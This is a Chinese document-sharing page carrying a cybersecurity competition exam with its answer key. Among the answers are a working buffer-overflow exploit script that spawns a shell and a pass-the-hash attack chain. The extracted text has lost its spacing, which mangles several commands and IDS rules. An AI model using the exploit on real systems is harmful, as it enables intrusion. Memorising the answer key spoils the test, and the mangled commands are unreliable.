版權說明:本文檔由用戶提供并上傳,收益歸屬內容提供方,若內容存在侵權,請進行舉報或認領
文檔簡介
2025年網絡安全比賽試題及答案一、單項選擇題(每題1分,共20分。每題只有一個正確答案,請將正確選項字母填在括號內)1.在TLS1.3握手過程中,用于實現前向安全性的密鑰交換機制是()A.RSA密鑰傳輸B.靜態(tài)DHC.ECDHED.PSK答案:C2.某Web應用使用JWT作為會話令牌,簽名算法為HS256。若攻擊者獲取了服務器的密鑰,則其可實施的攻擊是()A.重放攻擊B.簽名偽造C.跨站腳本D.會話固定答案:B3.在Linux內核中,可針對特定進程設置“禁用execve系統(tǒng)調用”的安全機制是()A.seccompbpfB.AppArmorC.SELinuxtypetransitionD.capabilities答案:A4.以下關于SM4分組密碼算法描述正確的是()A.分組長度128位,密鑰長度128位,輪數32輪B.分組長度128位,密鑰長度256位,輪數16輪C.分組長度64位,密鑰長度128位,輪數32輪D.分組長度256位,密鑰長度256位,輪數16輪答案:A5.針對DNSSEC的“簽名鏈”驗證失敗,最可能導致的后果是()A.域名無法解析B.解析結果不可信C.遞歸服務器緩存污染D.權威服務器拒絕服務答案:B6.在Windows系統(tǒng)中,能夠阻止非管理員用戶讀取受保護進程內存的防御技術是()A.CFGB.ACGC.ProtectedProcessLight(PPL)D.SEHOP答案:C7.某安卓App在Android13設備上聲明android:exported="true"的組件未設置任何權限,則該組件()A.只能被同一簽名應用啟動B.可被任意第三方應用啟動C.只能被系統(tǒng)應用啟動D.會被系統(tǒng)拒絕安裝答案:B8.以下關于BGP安全擴展(BGPsec)的描述,錯誤的是()A.使用RPKI驗證AS持有前綴的合法性B.對BGPUPDATE消息進行數字簽名C.依賴路徑上所有AS均支持BGPsecD.可防止路由泄漏答案:D9.在密碼學中,以下哪種模式同時提供保密性和完整性,且被TLS1.3采用()A.CBCB.GCMC.CTRD.ECB答案:B10.某企業(yè)采用零信任架構,其“動態(tài)信任評估引擎”最核心的輸入數據是()A.用戶靜態(tài)角色B.實時上下文風險信號C.網絡防火墻日志D.年度漏洞掃描報告答案:B11.針對IntelCPU的“Foreshadow”漏洞,利用的硬件特性是()A.SGXB.TSXC.VMXD.SMEP答案:A12.在Kubernetes中,可限制容器進程以非root身份運行的字段是()A.runAsNonRootB.allowPrivilegeEscalationC.readOnlyRootFilesystemD.capabilities.drop答案:A13.某APT組織使用“離地生存”技術,以下哪項屬于典型手段()A.上傳自定義木馬B.利用LivingofftheLand二進制文件C.注冊域名生成算法D.使用商業(yè)遠控答案:B14.在OWASPTop102021中,排名首次進入前三的風險是()A.注入B.失效的訪問控制C.加密失敗D.不安全設計答案:D15.某IDS規(guī)則“alerttcpanyany>any3389(msg:"RDPbruteforce";threshold:typethreshold,trackby_src,count5,seconds10;)”表示()A.10秒內同一源IP對3389端口的連接超過5次即告警B.10秒內不同源IP對3389端口連接超過5次即告警C.每5秒只允許10次連接D.每10秒只允許5次連接答案:A16.在密碼學安全證明中,INDCCA安全模型比INDCPA多出對以下哪種能力的抵抗()A.選擇明文攻擊B.選擇密文攻擊C.已知明文攻擊D.唯密文攻擊答案:B17.某云函數(Lambda)使用臨時AK/SK訪問對象存儲,最佳實踐是將憑證存儲在()A.環(huán)境變量B.代碼硬編碼C.IAM角色D.配置文件答案:C18.針對二維碼釣魚的“域名前置”技術,主要利用的協(xié)議是()A.HTTP/2B.DNSoverHTTPSC.CDNSNID.BGP答案:C19.在5G核心網中,用于實現用戶面完整性保護的算法是()A.128NEA1B.128NEA2C.128NIA3D.128NEA0答案:C20.某芯片采用“物理不可克隆函數”(PUF)生成密鑰,其安全性主要依賴()A.數學難題B.制造過程隨機變異C.軟件混淆D.側信道噪聲答案:B二、多項選擇題(每題2分,共20分。每題有兩個或兩個以上正確答案,多選、少選、錯選均不得分)21.以下哪些屬于針對NTP服務的反射放大攻擊特征()A.利用monlist命令B.源端口123C.響應包遠大于請求包D.使用TCP協(xié)議答案:A、B、C22.關于國密SM2橢圓曲線公鑰加密算法,下列描述正確的是()A.基于素域256位曲線B.數字簽名需使用SM3雜湊C.加密結果包含隨機分量D.私鑰長度為384位答案:A、B、C23.以下哪些技術可有效緩解SQL注入()A.參數化查詢B.ORM框架C.WAF關鍵字過濾D.存儲過程答案:A、B、C、D24.在Windows事件日志中,可輔助發(fā)現“哈希傳遞”攻擊的EventID包括()A.4624B.4625C.4648D.4672答案:A、B、C、D25.關于Ransomware防御,以下屬于“事前”階段措施的有()A.321備份策略B.網絡微分段C.解密工具收集D.郵件沙箱答案:A、B、D26.以下哪些屬于側信道攻擊()A.功耗分析B.電磁泄漏C.緩存時序D.故障注入答案:A、B、C、D27.在IPv6網絡中,可用來發(fā)現本地鏈路上活躍節(jié)點的機制有()A.NS/NAB.RS/RAC.MLDD.DHCPv6答案:A、B28.關于區(qū)塊鏈51%攻擊,下列說法正確的是()A.可雙花交易B.可阻止交易確認C.可修改歷史區(qū)塊數據D.可逆轉任意長度鏈答案:A、B29.以下哪些屬于云原生安全責任共擔模型中“云服務方”的責任()A.物理基礎設施B.虛擬化層C.客戶數據D.身份管理答案:A、B30.在Android13中,以下哪些權限屬于“受限權限”需特殊申請()A.READ_MEDIA_IMAGESB.POST_NOTIFICATIONSC.ACCESS_BACKGROUND_LOCATIOND.BODY_SENSORS_BACKGROUND答案:B、C、D三、填空題(每空2分,共20分)31.在Linux內核中,針對“臟?!甭┒矗–VE20165195)的補丁主要對__________子系統(tǒng)加入了“CopyonWrite”競態(tài)條件檢查。答案:內存管理(mm)32.TLS1.3中,用于實現0RTT重放保護的“防重放窗口”機制依賴于__________擴展字段。答案:EarlyData(max_early_data_size)33.國密SM3雜湊算法的輸出長度為__________位。答案:25634.在KubernetesRBAC中,若某Role綁定了“pods/escalate”子資源,則該角色可對Pod執(zhí)行__________操作。答案:提升權限(繞過準入)35.WindowsDefenderCredentialGuard利用__________技術將LSASS隔離在VBS安全區(qū)域。答案:虛擬化安全(VBS)與LsaIso36.針對WiFi6的WPA3SAE握手,若攻擊者離線暴力破解,需先獲取__________幀。答案:Commit37.在Python中,使用secrets.token_hex(16)生成的隨機字符串長度為__________字符。答案:3238.某IDS規(guī)則使用pcre:“/\x90{100,}/”,其目的是檢測__________攻擊。答案:NOPsled(堆棧溢出)39.在5GAKA流程中,歸屬網絡向終端下發(fā)的鑒權令牌稱為__________。答案:RAND+AUTN40.芯片級“熔斷”漏洞(Meltdown)利用的CPU微架構優(yōu)化是__________。答案:亂序執(zhí)行與緩存?zhèn)刃诺浪?、簡答題(每題10分,共30分)41.簡述零信任架構中“持續(xù)信任評估”引擎的核心數據源與處理流程,并給出一條可落地的風險評分公式。答案:核心數據源:1.身份信號:用戶多因素結果、設備證書狀態(tài)、登錄異常;2.網絡信號:源IP信譽、地理位置偏移、橫向移動圖;3.終端信號:EDR告警、系統(tǒng)補丁、運行進程哈希;4.應用信號:API異常調用、敏感數據下載量;5.外部威脅情報:惡意域名、APT指標。處理流程:采集→標準化→加權→衰減→輸出風險分。落地公式示例:RiskScore=w1×I+w2×N+w3×E+w4×A+w5×T其中I、N、E、A、T分別表示身份、網絡、終端、應用、情報的歸一化異常度(01),權重Σw=1。當RiskScore>0.7觸發(fā)強制二次認證;>0.9直接阻斷會話。42.某企業(yè)采用Kubernetes+istio服務網格,需實現“東西向流量”的mTLS全鏈路加密。請給出完整實施步驟,并說明如何驗證證書鏈。答案:步驟:1.安裝istio,啟用strictmTLS模式:istioctlinstallsetvalues.global.mtls.enabled=truesetmeshConfig.defaultConfig.mode=STRICT2.為所有命名空間打上標簽啟用自動注入:kubectllabelnsprodistioinjection=enabled3.部署Workload,確保Sidecar注入成功;4.創(chuàng)建PeerAuthentication資源,命名空間級別強制mTLS:apiVersion:security.istio.io/v1beta1kind:PeerAuthenticationmetadata:name:defaultnamespace:prodspec:mtls:mode:STRICT5.創(chuàng)建DestinationRule,定義客戶端TLS模式:trafficPolicy.tls.mode:ISTIO_MUTUAL6.驗證:a.進入sleepPod,執(zhí)行curlvhttp://service:port,觀察返回“certificaterequired”;b.使用openssls_clientconnectservice:portshowcerts,查看Istio自簽根證書;c.通過istioctlauthntlscheckd.svc.cluster.local,確認鏈上證書有效期、SAN、簽發(fā)者。43.描述一次完整的“哈希傳遞”攻擊鏈,并給出Windows與Linux環(huán)境下各自的檢測與遏制方案。答案:攻擊鏈:1.初始入口:釣魚郵件→獲取低權用戶;2.本地提權:利用未打補丁漏洞→SYSTEM;3.憑證收割:Mimikatz導出內存NTLM哈希;4.橫向移動:使用crackmapexec/psexec傳遞哈希登錄域控;5.目標達成:Dump域哈?!S金票據→持久化。Windows檢測:1.開啟高級審核,監(jiān)控EventID4624(LogonType3,AuthenticationPackage:NTLM);2.關注4625+4648,同一源IP多賬戶失?。?.使用SysmonRule:EventID10,CallTrace含“mimikatz”關鍵字;4.部署CredentialGuard,隔離LSASS;5.組策略限制NTLM(RestrictNTLM:Denyfordomain)。Linux檢測:1.審計日志:/var/log/audit/audit.log,搜索type=USER_AUTHacct=””exe=”/usr/bin/su”res=success;2.監(jiān)控/var/log/secure中PAM認證異常;3.使用AIDE校驗/etc/shadow完整性;4.遏制:a.強制Kerberos認證,禁用NTLM;b.實施/etc/pam.d/passwordauth的pam_tally2鎖定;c.網絡層:iptables限制445/139入口;d.部署JumpServer,統(tǒng)一審計。五、應用題(共60分)44.密碼協(xié)議分析(15分)某自制協(xié)議描述如下:①A→B:IDA||NA②B→A:NB||SigB(NA||NB)③A→B:EKAB(NB)其中SigB為B的RSA簽名,EKAB為預共享對稱密鑰。(1)指出該協(xié)議存在的兩個主要缺陷;(2)給出改進方案,要求引入會話密鑰前向安全性并抵抗密鑰泄露偽裝攻擊。答案:(1)缺陷:a.無時效性,無隨機數長度與格式校驗,易重放;b.簽名僅覆蓋NA||NB,未綁定身份與會話標識,存在身份混淆;c.對稱密鑰長期不變,無前向安全。(2)改進:①A→B:IDA||NA②B→A:NB||SigB(IDA||NA||NB||g^bmodp)③A→B:g^amodp||MACKAB(g^a)④雙方計算K=H(g^ab),后續(xù)使用K加密。引入臨時DH交換,簽名綁定身份與DH公鑰,實現前向安全;MAC驗證防篡改。45.逆向與漏洞利用(15分)給定x8632程序vuln,關鍵片段:```cvoidvuln(charsrc){charbuf[64];strcpy(buf,src);}```程序開啟NX,未開啟PIE與Canary,ASLR關閉。(1)寫出利用腳本,獲得shell(/bin/sh);(2)若系統(tǒng)開啟ASLR,請給出兩種仍可穩(wěn)定利用的思路。答案:(1)```python!/usr/bin/envpython3importstruct,subprocesspad=b'A'76system=0x08048430sh=0x0804a024payload=pad+struct.pack('<I',system)+b'BBBB'+struct.pack('<I',sh)subprocess.run(['./vuln'],input=payload)```(2)思路:a.信息泄露:利用程序中已有的puts/printf泄露出libc基址,計算system、/bin/sh偏移;b.ret2plt:重用程序PLT項,無需libc地址;c.部分覆蓋:只覆蓋EIP低2字節(jié),跳轉到固定區(qū)域ROP。46.網絡流量分析(15分)給定pcap,過濾條件“tcp.port==443”,發(fā)現大量TLSClientHello,SNI字段為“”,但證書SubjectCN為“.”。(1)指出攻擊場景;(2)給出檢測規(guī)則(Suricata/Snort)與遏制方案。答案:(1)域名前置(DomainFronting),利用CDNSNI與HTTPHost不一致隱藏真實C2。(2)Suricata規(guī)則:```alerttlsanyany>anyany(msg
溫馨提示
- 1. 本站所有資源如無特殊說明,都需要本地電腦安裝OFFICE2007和PDF閱讀器。圖紙軟件為CAD,CAXA,PROE,UG,SolidWorks等.壓縮文件請下載最新的WinRAR軟件解壓。
- 2. 本站的文檔不包含任何第三方提供的附件圖紙等,如果需要附件,請聯系上傳者。文件的所有權益歸上傳用戶所有。
- 3. 本站RAR壓縮包中若帶圖紙,網頁內容里面會有圖紙預覽,若沒有圖紙預覽就沒有圖紙。
- 4. 未經權益所有人同意不得將文件中的內容挪作商業(yè)或盈利用途。
- 5. 人人文庫網僅提供信息存儲空間,僅對用戶上傳內容的表現方式做保護處理,對用戶上傳分享的文檔內容本身不做任何修改或編輯,并不能對任何下載內容負責。
- 6. 下載文件中如有侵權或不適當內容,請與我們聯系,我們立即糾正。
- 7. 本站不保證下載資源的準確性、安全性和完整性, 同時也不承擔用戶因使用這些下載資源對自己和他人造成任何形式的傷害或損失。
最新文檔
- 職業(yè)噪聲對自主神經功能的影響及機制
- 客服主管年終總結公式(3篇)
- 職業(yè)健康管理倫理問題探討
- 職業(yè)健康檔案電子化數據挖掘與早期干預策略
- 職業(yè)健康促進工作規(guī)范化與可持續(xù)發(fā)展
- 齊齊哈爾2025年黑龍江齊齊哈爾市委網絡安全和信息化委員會辦公室直屬事業(yè)單位招聘筆試歷年參考題庫附帶答案詳解
- 韶關2025年廣東韶關市教育局直屬學校招聘臨聘教師23人筆試歷年參考題庫附帶答案詳解
- 西雙版納云南西雙版納州人力資源和社會保障局公益性崗位招聘筆試歷年參考題庫附帶答案詳解
- 舟山2025年下半年浙江舟山市屬事業(yè)單位招聘28人筆試歷年參考題庫附帶答案詳解
- 玉林2025年廣西玉林市第二幼兒園招聘安保人員筆試歷年參考題庫附帶答案詳解
- GB/T 6974.5-2023起重機術語第5部分:橋式和門式起重機
- 心臟血管檢查課件
- 運用PDCA循環(huán)管理提高手衛(wèi)生依從性課件
- 二手房定金合同(2023版)正規(guī)范本(通用版)1
- 《高職應用數學》(教案)
- 點因素法崗位評估體系詳解
- 漢堡規(guī)則中英文
- DB63T 1933-2021無人機航空磁測技術規(guī)范
- YY/T 1843-2022醫(yī)用電氣設備網絡安全基本要求
- GB/T 5231-2022加工銅及銅合金牌號和化學成分
- GB/T 26480-2011閥門的檢驗和試驗
評論
0/150
提交評論